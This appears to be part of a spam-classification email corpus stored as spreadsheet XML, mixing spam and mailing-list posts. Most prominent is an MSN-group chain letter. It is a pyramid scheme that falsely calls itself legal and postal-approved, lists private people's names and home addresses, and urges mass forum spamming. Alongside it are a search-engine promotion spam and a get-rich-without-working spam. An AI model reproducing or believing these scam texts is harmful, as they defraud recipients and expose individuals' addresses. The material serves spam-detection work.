             &lt;TR&gt;
                &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
                &lt;TD align=3Dleft width=3D100%&gt;&lt;FONT size=3D"1"&gt;
 		          &lt;A =
 href=3D"mailto:trista@witty.com?subject=3DRe%3A%20Make%20some%20extra%20m=
 oney%20fast%20Read%20how%20here%20it%20is%20real%20simple%20i%20am%20tota=
 ly%20serious" title=3D"Send a reply to the sender of this =
 message."&gt;&lt;FONT face=3D"Verdana,Arial,Helvetica,Sans Serif" =
 class=3DThmFgCommand size=3D"1"&gt;&lt;B&gt;Reply to Sender&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;
 		          &amp;nbsp;&amp;nbsp;&lt;/FONT&gt;&lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/_notifications.msnw?type=3D=
 msg&amp;action=3Drecommend&amp;parent=3D1&amp;item=3D1393" title=3D"Increase the =
 number of recommendations for this message."&gt;&lt;IMG align=3Dmiddle =
 border=3D0 height=3D16 hspace=3D3 width=3D16 =
 src=3Dhttp://sc.communities.msn.com/themes/pby/img/mb/recommend.gif&gt;&lt;FONT=
  face=3D"Verdana,Arial,Helvetica,Sans Serif" class=3DThmFgCommand =
 size=3D"1"&gt;&lt;B&gt;Recommend&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;
 			      &lt;/TD&gt;
                   &lt;TD align=3Dright nowrap&gt;&lt;FONT size=3D"1"&gt;Message 1 in =
 Discussion&lt;/FONT&gt;
                &lt;/TD&gt;                                =20
 		    &lt;/TR&gt;
 		  &lt;/TABLE&gt;
         &lt;/TD&gt;
       &lt;/TR&gt;&lt;TR&gt;        	   =20
         &lt;TD colspan=3D2&gt;&lt;TABLE border=3D0 cellpadding=3D4 =
 cellspacing=3D0 width=3D100%&gt;
 		    &lt;TR&gt;&lt;TD class=3DThmBgHighlightLight&gt;
 		      &lt;FONT face=3D"Arial, Helvetica, Sans Serif" =
 class=3DThmFgInactiveText size=3D"2"&gt;From: &lt;/FONT&gt;
 			  &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/profile?user=3DTrista" =
 title=3D"View Member Information of sender."&gt;&lt;FONT face=3D"Arial, =
 Helvetica, Sans Serif" class=3DThmFgMiscText =
 size=3D"2"&gt;Trista&lt;/FONT&gt;&lt;/A&gt;
 			&lt;/TD&gt;&lt;/TR&gt;
 			&lt;TR&gt;&lt;TD class=3DThmBgStandard&gt;
 			  &lt;BR&gt;
               &lt;DIV&gt; &lt;DIV&gt;READING THIS MESSAGE WILL CHANGE YOUR LIFE =
 FOREVER &lt;BR&gt;!!!!!! PLEASE READ THIS ALL!!!!!!!!! &lt;BR&gt;!!!! NOT A SCAM!!!! =
 &lt;BR&gt;!!! I REPEAT NOT A SCAM!!! &lt;BR&gt;THIS ONLY COST YOU 6.00 CASH!!! =
 INVESTMENT!!! IT DOES WORK!!! &lt;BR&gt;I found this on a bulletin board and =
 decided to try it. A little while back, I was browsing through =
 newsgroups, just like you are now, and came across an article similar to =
 this that said you could make thousands of dollars within weeks with =
 only an initial investment of $6.00! So I thought, Yeah right, this must =
 be a scam", but like most of us, I was curious, so I kept reading. =
 Anyway, it said that you send $1.00 to each of the 6 names and address =
 stated in the article. You then place your own name and address in the =
 bottom of the list at #6, and post the article in at least 200 =
 newsgroups. (There are thousands) No catch, that was it. So after =
 thinking it over, and talking to a few people first, I thought about =
 trying it. I figured: "what have I got to lose except 6 stamps and =
 $6.00, right?" Then I invested the measly $6.00. Well GUESS WHAT!?... =
 Within 7 days, I started getting money in the mail! I was shocked! I =
 figured it would end soon, but the money just kept coming in. In my =
 first week, I made about $25.00. By the end of the second week I had =
 made a total of over $1,000.00! In the third week I had over $10,000.00 =
 and it's still growing. This is how my fourth week and I have made a =
 total of just over $42,000.00 and it's still coming in rapidly. It's =
 certainly worth $6.00, and 6 stamps, I have spent more than that on the =
 lottery!!(This is not me but i am&amp;nbsp;also making alot of =
 money)&amp;nbsp;&lt;BR&gt;&lt;BR&gt;Let me tell you how this works and most importantly, =
 WHY it works... Also, make sure you print a copy of this article NOW, so =
 you can get the information off of it, as you need it. I promise you =
 that if you follow the directions exactly, that you will start making =
 more money than you thought possible by doing something so easy! =
 Suggestion: Read this entire message carefully! (Print it out or =
 download it.) Follow the simple directions and watch the as money comes =
 in! It's easy. It's legal. And, your investment is only $6.00 (Plus =
 postage) &lt;BR&gt;&lt;BR&gt;IMPORTANT: This is not a rip-off; it is not indecent; =
 it is not illegal; and it is 99% no risk - it really works! If all of =
 the following instructions are adhered to, you will receive =
 &lt;BR&gt;extraordinary dividends. &lt;BR&gt;&lt;BR&gt;PLEASE NOTE: &lt;BR&gt;Please follow =
 these directions EXACTLY, and $50,000 or more can be yours in 20 to 60 =
 days. This program remains successful because of the honesty and =
 integrity of the participants. Please continue its success by carefully =
 adhering to the instructions. You will be part of the Mail Order =
 business. In this business your product is not solid and tangible, it's =
 a service. You are in the business of developing Mailing Lists. Many =
 large corporations are happy to pay big bucks for quality lists. =
 However, the money made from the mailing lists is secondary to the =
 income, which is made from people like you and me asking to be included =
 in that list. Here are the 4 easy steps to success: &lt;BR&gt;&lt;BR&gt;STEP 1: Get =
 6 separate pieces of paper and write the following on &lt;BR&gt;each piece of =
 paper "PLEASE PUT ME ON YOUR MAILING LIST." Now &lt;BR&gt;get 6 US $1.00 bills =
 and place ONE inside EACH of the 6 pieces of paper so the bill will not =
 be seen through the envelope (to prevent thievery). Next, place one =
 paper in each of the 6 envelopes and seal them. You should now have 6 =
 sealed envelopes, each with a piece of paper stating the above phrase, =
 your name and address, and a $1.00 bill. What you are doing is creating =
 a service. THIS IS ABSOLUTELY LEGAL! You are requesting a legitimate =
 service and you are paying for it! Like most of us I was a little =
 skeptical and a little worried about the legal aspects of it all. So I =
 checked it out with the U.S. Post Office (1-800-725-2161) and they =
 confirmed that it is indeed legal. Mail the 6 envelopes to the following =
 addresses: &lt;BR&gt;&lt;BR&gt;#1) Mike Gordon, 204 South Maple St., Winchester, =
 KY.40391 &lt;BR&gt;#2) Jeff Waldrop, 39-A Lucy Rd., Laurel, MS 39443 &lt;BR&gt;#3) =
 Brian Thompson, 15 Briggs Pond WY. Sharon, MA 02067 &lt;BR&gt;#4) A. Guy , =
 6127 Seabree LN, ,Ft. Wayne, In 46835 &lt;BR&gt;#5) Wes Armstrong, 157 =
 Butternut Rd., Shavertown, PA 18708 &lt;BR&gt;#6) Trista Friend, P.O. Box =
 1265, Long Beach, WA 98631 &lt;BR&gt;&lt;BR&gt;STEP 2: Now take the #1 name off the =
 list that you see above, move &lt;BR&gt;the other names up 1 place (#2 becomes =
 #1, #3 becomes #2, etc.) and add YOUR name and address as number 6 on =
 the list. &lt;BR&gt;&lt;BR&gt;STEP 3: Change anything you need to, but try to keep =
 this article as &lt;BR&gt;close to original as possible. Now, post your =
 amended article to at least 200 newsgroups. (I think there are close to =
 24,000 groups) All you need is 200, but remember, the more you post, the =
 more money you make! You won't get very much unless you post like crazy. =
 This is perfectly legal! If you have any doubts, refer to &lt;BR&gt;Title 18 =
 Sec. 1302 &amp;amp; 1341 of the Postal lottery laws. Keep a copy of these =
 steps for yourself and, whenever you need money, you can use it again, =
 and again. &lt;BR&gt;&lt;BR&gt;PLEASE REMEMBER that this program remains successful =
 because of the honesty and integrity of the participants and by their =
 carefully adhering to the directions. Look at it this way. If you are of =
 integrity, the program will continue and the money that so many =
 &lt;BR&gt;others have received will come your way. &lt;BR&gt;NOTE: You may want to =
 retain every name and address sent to you, either on a computer or hard =
 copy and keep the notes people send you. This VERIFIES that you are =
 truly providing a service. (Also, it might be a good idea to wrap the $1 =
 bill in dark paper to reduce the risk of mail theft.) So, as each post =
 is downloaded and the directions carefully followed, six members will be =
 reimbursed for their participation as a List Developer with one dollar =
 each. Your name will move up the list geometrically so that when your =
 name reaches the #1 position you will be receiving thousands of dollars =
 in CASH!!! What an opportunity for only $6.00 ($1.00 for each of the =
 first six people listed above) Send it now, and add your own name to the =
 list and you're in business! &lt;BR&gt;&lt;BR&gt;-----DIRECTIONS ----- FOR HOW TO =
 POST TO NEWSGROUPS-------------- &lt;BR&gt;Step 1) You do not need to re-type =
 this entire letter to do your own posting. Simply put your cursor at the =
 beginning of this letter and drag your cursor to the bottom of this =
 document, and select 'copy' from the edit menu. This will copy the =
 entire letter into the computer's memory. &lt;BR&gt;&lt;BR&gt;Step 2) Open a blank =
 'notepad' file and place your cursor at the top of the blank page. From =
 the 'edit' menu select 'paste'. This will paste a copy of the letter =
 into notepad so that &lt;BR&gt;you can add your name to the list. &lt;BR&gt;&lt;BR&gt;Step =
 3) Save your new notepad file as a .txt file. If you want to do your =
 postings in different settings, you'll always have this file to go back =
 to. &lt;BR&gt;&lt;BR&gt;Step 4) Use Netscape or Internet explorer and try searching =
 for various newsgroups (on-line forums, message boards, chat sites, =
 discussions.) &lt;BR&gt;&lt;BR&gt;Step 5) Visit these message boards and post this =
 article as a new message by highlighting the text of this letter and =
 selecting paste from the edit menu. Fill in the Subject, this will =
 &lt;BR&gt;be the header that everyone sees as they scroll through the list of =
 postings in a particular group, click the post message button. You're =
 done with your first one! Congratulations...THAT'S IT! All you have to =
 do is jump to different newsgroups and post away, after you get the hang =
 of it, it will take about 30 seconds for each newsgroup! =
 &lt;BR&gt;&lt;BR&gt;**REMEMBER, THE MORE NEWSGROUPS YOU POST IN, THE MORE MONEY YOU =
 WILL MAKE! BUT YOU HAVE TO POST A MINIMUM OF 200** &lt;BR&gt;&lt;BR&gt;that's it! =
 You will begin receiving money from around the world within days! You =
 may &lt;BR&gt;eventually want to rent a P.O. Box due to the large amount of =
 mail you will receive. If &lt;BR&gt;you wish to stay anonymous, you can invent =
 a name to use, as long as the postman will deliver it. **JUST MAKE SURE =
 ALL THE ADDRESSES ARE CORRECT. ** &lt;BR&gt;&lt;BR&gt;Now, each of the 5 persons who =
 just sent me $1.00 make the MINIMUM 200 postings, each with my name at =
 #5 and only 5 persons respond to each of the original 5, that is another =
 $25.00 for me, now those 25 each make 200 MINIMUM posts with my name at =
 #4 and only 5 replies each, I will bring in an additional $125.00! Now, =
 those 125 persons turn around and post the MINIMUM 200 with my name at =
 #3 and only receive 5 replies each, I will make an additional $625.00! =
 OK, now here is the fun part, each of those 625 persons post a MINIMUM =
 200 letters with my name at #2 and they each only receive 5 &lt;BR&gt;replies, =
 that just made me $3,125.00!!! Those 3,125 persons will all deliver this =
 message to 200 newsgroups with my name at #1 and if still 5 persons per =
 200 newsgroups react I will receive $15,625,00! With an original =
 investment of only $6.00! AMAZING! When your name is no longer on the =
 list, you just take the latest posting in the newsgroups, and send out =
 another $6.00 to names on the list, putting your name at number 6 again. =
 And start posting again. Do you TURN 6 (six) DOLLARS INTO $6000 or even =
 $60000 EASY AND HONESTLY!!! &lt;BR&gt;&lt;BR&gt;The thing to remember is: do you =
 realize that thousands of people all &lt;BR&gt;over the world are joining the =
 Internet and reading these articles everyday? JUST LIKE YOU are now!! =
 So, can you afford $6.00 and see if it really works?? I think so... =
 People have said, "what if the plan is played out and no one sends you =
 the money?" So what! What are the chances of that happening when there =
 are tons of new honest users and new honest people who are joining the =
 Internet and newsgroups everyday and are willing to give it a try? =
 Estimates are at 20,000 to 50,000 new users, every day, with thousands =
 of those joining the actual Internet. Remember, play FAIRLY and HONESTLY =
 and this will really work.&lt;/DIV&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
 		  &lt;/TABLE&gt;
 		&lt;/TD&gt;
       &lt;/TR&gt;
           &lt;/TABLE&gt;
   &lt;BR&gt;
     &lt;A href=3D"http://groups.msn.com/Browse?CatId=3D134"&gt;View other =
 groups in this category.&lt;/A&gt;
   &lt;BR&gt;
   &lt;BR&gt;
       &lt;!--WSSTRIPPABLEBEGIN--&gt;
     &lt;a =
 href=3D"http://g.msn.com/0ADW/136212.1??UIT=3D&amp;amp;TargetID=3D31706&amp;amp;C=
 txID=3D2&amp;amp;PID=3D308646&amp;amp;AN=3D11247" target=3D"_top"&gt;&lt;img =
 src=3D"http://global.msads.net/ads/WBCMON/002111790010_LG.gif" =
 alt=3D"Click Here!" height=3D"60" width=3D"468" border=3D"0" &gt;&lt;/a&gt;    =
 &lt;!--WSSTRIPPABLEEND--&gt;
 &lt;!--WSSTRIPPABLEBEGIN--&gt;&lt;P&gt;&lt;STYLE&gt;&lt;!--
 ADMSmLnk{font-family:verdana,system;color:#336699;text-decoration:none;}
 ADMSmLnk:hover{color:#ff6600;text-decoration:underline;}
 --&gt;&lt;/STYLE&gt;
 &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D500 border=3D0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;FONT face=3Dverdana color=3D#333366 size=3D1&gt;&lt;B&gt;Also on =
 MSN:&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;A class=3DADMSmLnk =
 href=3D"http://g.msn.com/2GRENUS/2_8085_01"&gt;&lt;FONT face=3Dverdana =
 color=3D#336699 size=3D1&gt;Start Chatting&lt;/FONT&gt;&lt;/A&gt;&amp;nbsp;&lt;FONT =
 face=3Dverdana color=3D#333366 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A =
 class=3DADMSmLnk href=3D"http://g.msn.com/2GRENUS/2_8085_02"&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;Listen to Music&lt;/FONT&gt;&lt;/A&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;FONT =
 face=3Dverdana color=3D#333366 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A =
 class=3DADMSmLnk href=3D"http://g.msn.com/2GRENUS/2_8085_03"&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;House &amp;amp; Home&lt;/FONT&gt;&lt;/A&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;FONT =
 face=3Dverdana color=3D#333366 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A =
 class=3DADMSmLnk href=3D"http://g.msn.com/2GRENUS/2_8085_04"&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;Try Online =
 Dating&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=3Dverdana color=3D#336699 =
 size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;FONT face=3Dverdana color=3D#333366 =
 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A class=3DADMSmLnk =
 href=3D"http://g.msn.com/2GRENUS/2_8085_05"&gt;&lt;FONT face=3Dverdana =
 color=3D#336699 size=3D1&gt;Daily Horoscopes&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=3Dverdana =
 color=3D#336699 size=3D1&gt;&lt;/FONT&gt;=20
 &lt;TD&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;&lt;!--WSSTRIPPABLEEND--&gt;&lt;/BLOCKQUOTE&gt;
 &lt;!--WSSTRIPPABLEBEGIN--&gt;
 &lt;TABLE border=3D0 cellpadding=3D0 cellspacing=3D0 width=3D"100%"&gt;
   &lt;TR class=3DThmBgDivider&gt;&lt;TD width=3D"100%" height=3D"1""&gt;&lt;img =
 border=3D"0" src=3D"http://sc.communities.msn.com/img/c.gif" =
 width=3D"100%" height=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D"100%" class=3DThmBgAlternate&gt;
       &lt;BLOCKQUOTE&gt;
       &lt;FONT face=3D"Arial, Helvetica, Sans Serif" class=3DThmFgStandard =
 size=3D"1"&gt;
         &lt;BR&gt;
                   To stop getting this e-mail, or change how often it =
 arrives, go to your &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/_emailsettings.msnw"&gt;&lt;FONT =
 class=3DThmFgMiscText&gt;E-mail Settings&lt;/FONT&gt;&lt;/A&gt;.          &lt;BR&gt;&lt;BR&gt;
 		                  Need help? If you've forgotten your password, please =
 go to &lt;A =
 href=3D"http://groups.msn.com/_passportredir.msnw?ppmprop=3Dhelp"&gt;&lt;FONT =
 class=3DThmFgMiscText&gt;Passport Member Services&lt;/FONT&gt;&lt;/A&gt;.          &lt;BR&gt;
 		                  For other questions or feedback, go to our &lt;A =
 href=3D"http://groups.msn.com/contact"&gt;&lt;FONT =
 class=3DThmFgMiscText&gt;Contact Us&lt;/FONT&gt;&lt;/A&gt; page.          &lt;BR&gt;&lt;BR&gt;
 		                  If you do not want to receive future e-mail from =
 this MSN group, or if you received this message by mistake, please click =
 the "Remove" link below. On the pre-addressed e-mail message that opens, =
 simply click "Send". Your e-mail address will be deleted from this =
 group's mailing list.
           &lt;BR&gt;
             &lt;A href=3D"mailto:OneIncomeLiving-remove@groups.msn.com" =
 title=3D"Send a request to have your e-mail removed from this =
 group."&gt;&lt;FONT class=3DThmFgMiscText&gt;Remove my e-mail address from One =
 Income Living.&lt;/FONT&gt;&lt;/A&gt;
 		      &lt;/BLOCKQUOTE&gt;
     &lt;/TD&gt;
   &lt;/TD&gt;
 &lt;/TABLE&gt;
 &lt;!--WSSTRIPPABLEEND--&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 ------=_NextPart_000_D20F_01C23B49.FFE05AE0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Niall O Broin wrote:
 &gt; On Mon, Aug 19, 2002 at 10:27:57AM +0100, Padraig Brady wrote:
 &gt; 
 &gt; 
 &gt;&gt;&gt;Well, here's a solution using seq and sed - IMHO its a rather dim solution
 &gt;&gt;&gt;and it definitely dies if STRING contains / (and probably has other ways to
 &gt;&gt;&gt;die too) and a bash loop would certainly be faster, but you know how to do
 &gt;&gt;&gt;it with loops :-)
 &gt;&gt;&gt;
 &gt;&gt;&gt;PREFIX=seq -s "" $NUMBER|sed "s/./$STRING/g"_x001b_OA
 &gt;&gt;
 &gt;&gt;clever. A bit more robust is:
 &gt;&gt;#first param is number of
 &gt;&gt;#times to repeat second param
 &gt;&gt;#
 &gt;&gt;#e.g. quote=`repeat 3 '&gt; '`
 &gt;&gt;repeat() {
 &gt;&gt;    seq -s , $1 | sed "s[0-9]\{1,\}[,]*$2g"
 &gt;&gt;}
 &gt; 
 &gt; But it's such a crap colution anyway, why would you want to make it more
 &gt; robust ?
 &gt; 
 Give yourself credit :-) it's a nice solution,
 with just 2 lightweight processes. The same thing
 coded in shell loops wouldn't be nearly as elegant
 and not as scalable to boot.
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I have visited WWW.TAINT.ORG and noticed that ...
</t>
  </si>
  <si>
    <t xml:space="preserve">
 BAD MSG:
 PAM: -------------------- Start SpamAssassin results ----------------------
 SPAM: This mail is probably spam.  The original message has been altered
 SPAM: so you can recognise or block similar unwanted mail in future.
 SPAM: See http://spamassassin.org/tag/ for more details.
 SPAM: 
 SPAM: Content analysis details:   (9.9 hits, 5 required)
 SPAM: SEARCH_ENGINE_PROMO (2.6 points)  BODY: Discusses search engine listings
 SPAM: HTML_50_70         (1.0 points)  BODY: Message is 50-70% HTML tags
 SPAM: REALLY_UNSAFE_JAVASCRIPT (3.3 points)  BODY: Auto-executing JavaScript code
 SPAM: SUPERLONG_LINE     (0.4 points)  BODY: Contains a line &gt;=199 characters long
 SPAM: CTYPE_JUST_HTML    (1.7 points)  HTML-only mail, with no text version
 SPAM: PRIORITY_NO_NAME   (1.0 points)  Message has priority setting, but no X-Mailer
 SPAM: MSG_ID_ADDED_BY_MTA_3 (0.2 points)  'Message-Id' was added by a relay (3)
 SPAM: AWL                (-0.3 points) AWL: Auto-whitelist adjustment
 SPAM: 
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;style type="text/css"&gt;
 .stbtm {
 	BACKGROUND-COLOR:#cecbde; BORDER-BOTTOM: #665b8e 1px solid; BORDER-LEFT: #ffffff 1px solid; BORDER-RIGHT: #665b8e 1px solid; BORDER-TOP: #ffffff 1px solid; COLOR: #000000; FONT-SIZE: 12pt; HEIGHT: 26px; WIDTH: 120px; clip:        rect(   )}
 .stedit {
 	 background-color:#484C68; white-space: nowrap; border: #000000; BORDER-BOTTOM: #ffffff 1px solid; BORDER-LEFT: #ffffff 1px solid; BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #ffffff 1px solid; FONT-SIZE: 10pt; color: #CCCCCC; font-weight: bold}
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;BODY leftMargin=0 onload="" topMargin=0 marginheight="0" marginwidth="0" bgcolor="#FFFFFF"&gt;
 &lt;table width="778" border="0" cellspacing="0" cellpadding="0"&gt;
   &lt;tr&gt;
     &lt;td height="233" width="21"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td height="233" colspan="3" width="757"&gt; 
       &lt;table width="621" border="0" cellspacing="0" cellpadding="0" align="left"&gt;
         &lt;tr&gt; 
           &lt;td width="373" height="64"&gt; 
             &lt;table width="373" border="0" cellspacing="0" cellpadding="0" background="http://image.seekercenter.net/letter_bg.jpg" height="327"&gt;
                 &lt;tr&gt; 
                 &lt;td&gt;&lt;p&gt; 
                   &lt;font face=Arial size=2&gt;
                   &lt;/font&gt; &lt;font face=Arial size=2&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#000000"&gt;Hello,&lt;br&gt;
                   &lt;br&gt;
                   I have visited &lt;a href='http://www.taint.org'&gt;www.taint.org&lt;/a&gt; and noticed that your website is not listed on some search engines.
                   I am sure that through our service the number of people who visit your website will definitely increase. &lt;a target=_blank href="http://www.seekercenter.net/index.php"&gt;SeekerCenter&lt;/a&gt; 
                   is a unique technology that instantly submits your website 
                   to over 500,000 search engines and directories  
                   -- a really low-cost and effective way to advertise your site. 
                   For more details please go to &lt;a target=_blank href="http://www.seekercenter.net/index.php"&gt;SeekerCenter.net&lt;/a&gt;.&lt;br&gt;
                   &lt;br&gt;
                   Give your website maximum exposure today!&lt;BR&gt;
                   Looking forward to hearing from you.&lt;br&gt;
                   &lt;BR&gt;
                   &lt;table border=0 width=100%&gt;&lt;TR&gt;&lt;TD width=50%&gt;
                   &lt;font face="Verdana, Arial, Helvetica, sans-serif" size=2 color="#000000"&gt;Best 
                   Regards,&lt;br&gt;
                   Vanessa Lintner&lt;br&gt;
                   Sales &amp;amp; Marketing &lt;br&gt;
                   &lt;a target=_blank href="http://www.seekercenter.net/index.php"&gt;www.SeekerCenter.net&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;
                   &lt;TD&gt;&lt;td width=50%&gt;
                    &lt;div align="center" valign=middle&gt;
                    &lt;form target=_blank action=http://www.seekercenter.net method=POST&gt;
                           &lt;input type="submit" name="Submit" value="Signup Now!!!" class="stbtm"&gt;
                    &lt;/form&gt;
                         &lt;/div&gt;
                   &lt;/TD&gt;
                   &lt;/TR&gt;
                   &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;td width="242" height="64" valign="bottom"&gt; 
             &lt;table width="257" border="0" cellspacing="0" cellpadding="0"&gt;
                 &lt;tr&gt;
                   &lt;td colspan="3" height="2"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt; 
                   &lt;td colspan="3" height="3"&gt; 
                   &lt;p&gt;&lt;img src="http://image.seekercenter.net/letter_top01.jpg" width="326" height="15"&gt;&lt;/p&gt;
                     &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt; 
                   &lt;td colspan="3"&gt;&lt;img src="http://image.seekercenter.net/letter_right01.jpg" width="31" height="185"&gt;&lt;A target=_blank Href ="http://www.taint.org"&gt;&lt;IMG Src =http://image4.seekercenter.net/image1622/6/42/img480.jpg Border=0 width="256" height="184"&gt;&lt;/A&gt;&lt;img src="http://image.seekercenter.net/letter_left01.jpg" width="14" height="185"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td colspan="3" height="80" background="http://image.seekercenter.net/letter_bottom01.jpg"&gt; 
                   &lt;table width="326" border="0" cellspacing="0" cellpadding="0" height="80"&gt;
                     &lt;tr&gt;
                       &lt;td width="36" height="43"&gt;&amp;nbsp;&lt;/td&gt;
                       &lt;td width="157" height="43"&gt;&amp;nbsp;&lt;/td&gt;
                       &lt;td width="134" height="43"&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;
                       &lt;td width="36" height="2"&gt;&amp;nbsp;&lt;/td&gt;
                       &lt;td width="157" height="2"&gt;&amp;nbsp;&lt;/td&gt;
                       &lt;td width="134" height="2"&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt; &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Craig R.Hughes wrote:
  &gt;
  &gt; On Thursday, August 8, 2002, at 11:15  AM, Mika Hirvonen wrote:
  &gt;
  &gt;&gt; I do not know the algorithms used to calculate confidence values, but it
  &gt;&gt; probably penalizes heavily when someone revokes spam that everyone else
  &gt;&gt; considers as spam. Or at least it should.
  &gt;
  &gt;
  &gt; The problem with that is that invariably, there are "gray" mails.  Some
  &gt; people will vote "spam", others will vote "nonspam" -- under your
  &gt; proposed system, anyone who ever calls "gray" mail nonspam will have a
  &gt; shitty trust score.  And once you have a shitty trust score, your own
  &gt; submissions won't even be used to flag your own spam as spam.  That's
  &gt; bound to confuse a lot of people.  "But I just marked that exact message
  &gt; as spam.  Why is it not being considered spam?  I'm an honest submitter."
 I assume that how much the trust goes down depends of the proportion of
 report vs revoke. If everybody except one says that a mail is spam, the
 one guy will see his trust go down dramatically. If you are with the
 majority, your trust goes up. If you are against the majority, your
 trust goes down. If people 50-50, whatever you vote, your neither
 against the majority nor with it, so your trust won't change. So your
 "gray" mail won't have much influence on your trust (neither good nor
 bad, just... gray)
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I don't work...but I have a ton of money! vhcw
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello 
 THIS E-MAIL AD IS BEING SENT IN FULL COMPLIANCE WITH U.S. SENATE BILL 1618, TITLE #3, SECTION 301
 TO REMOVE YOURSELF SEND A BLANK E-MAIL TO: removal999@yahoo.com
 =====================================================================================
 YOU ARE GETTING THIS EMAIL BECAUSE YOU ARE ON A LIST OF PEOPLE THAT WANT ALL THE MONEY  THEY  CAN SPEND WITHOUT WORKING FOR IT...YOU WILL ONLY GET THIS ONCE, SO PLEASE DO NOTHING  
 IF YOU WOULD LIKE TO BE REMOVED! (By Doing nothing you will automatically be removed )
 =====================================================================================
 We really are looking for TRULY lazy people that dream about being able to do what they 
 want, when they want AND DO SO WITHOUT WORKING.
 We want the type of people that drive by a house and say that they want that house some 
 day, but would love to own that house through money generated while they sleep or while 
 they are on vacation.
 We want the type of people that would like to send their children to "Harvard" or 
 "Stanford" and have these educations paid for through money generated while they sleep or 
 while they are on vacation.
 We want the type of people that see a new T-Bird, Corvette or Jaguar and want to own these 
 cars and have them paid for through money generated while they sleep or while they are on 
 vacation.
 We want the type of people that on a whim want to travel to maybe Maui in the winter or 
 Alaska in the summer and while there if they choose to buy a home in either place, they can 
 do so through money generated while they sleep or while they are on vacation.
 We want the people that would like to sleep till noon if they choose to or get up and go to 
 the country club to play golf if they choose to and do so because they always have a stream 
 of income through money generated while they sleep or while they are on vacation.
 We want the type of people that truly hate the thought of getting up in the morning and 
 making money for some one else.
 We want the type of people that deep down want to tell some snob that thinks he's a big 
 deal because he or she drives a Mercedes, that the Rolls Royce that you are driving is paid 
 for and tomorrow you might buy yourself a Porche and if you are in the mood to, you might 
 buy your wife or friend a BMW.  In other words, you deep down want to tell the snobs of the 
 world, that they really are managing their debt, but you have what you want when you want 
 and you have it all with no debt and you have all of this through money generated while you 
 sleep or while you are on vacation.
 Seriously, if you want more money than you can spend and you really, truly DO NOT WANT TO 
 WORK, then you are the type of person we are looking for.
 If you would like to know why some people can do this...then simply send a blank email with 
 the words: "I HATE TO WORK" in the subject area to:
 ihatetowork99@yahoo.com
 After doing so, you will be contacted in less than 24 hours and learn how to get the house 
 you want, the education for your children that you would like them to have, go on the 
 vacation you want, when you want all through money generated while you sleep or while you 
 are playing golf or while you are on vacation.
 Also, we do not want you to hear from us again if the idea of making all the money you want 
 is not exciting to you...therfore this is the first and last email you will get unless we 
 hear from you...so if you want TO GET RICH with out working, then simply send a blank email 
 with the words: "I HATE TO WORK" in the subject area to:
 ihatetowork99@yahoo.com
 Thank you,
 "The I hate to work" associates
 Subject:  I don't work...but I have a ton of money!
 iqccjypkiducrbiixmqcuncw
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: apt and a hybrid system
</t>
  </si>
  <si>
